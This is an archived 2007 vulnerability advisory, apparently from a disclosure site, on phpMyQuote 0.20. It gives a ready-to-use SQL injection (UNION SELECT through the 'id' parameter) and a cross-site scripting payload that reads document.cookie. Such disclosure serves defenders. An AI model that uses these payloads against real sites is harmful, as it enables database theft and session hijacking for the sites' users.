phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

2007.09.13

Credit: yollubunlar

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-4836 | CVE-2007-4835

CWE: N/A

///////////////  Yollubunlar.org ///////////////

title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

Author : Yollubunlar.Org

Orginal Article: http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulne
rabilities-3501.html

MainPage: http://yollubunlar.org/category/web-security

mail : yollubunlar (at) yollubunlar (dot) org [email concealed]

Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql injction]

Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/*

Exploit Xss :http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

///////////////  Yollubunlar.org ///////////////

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.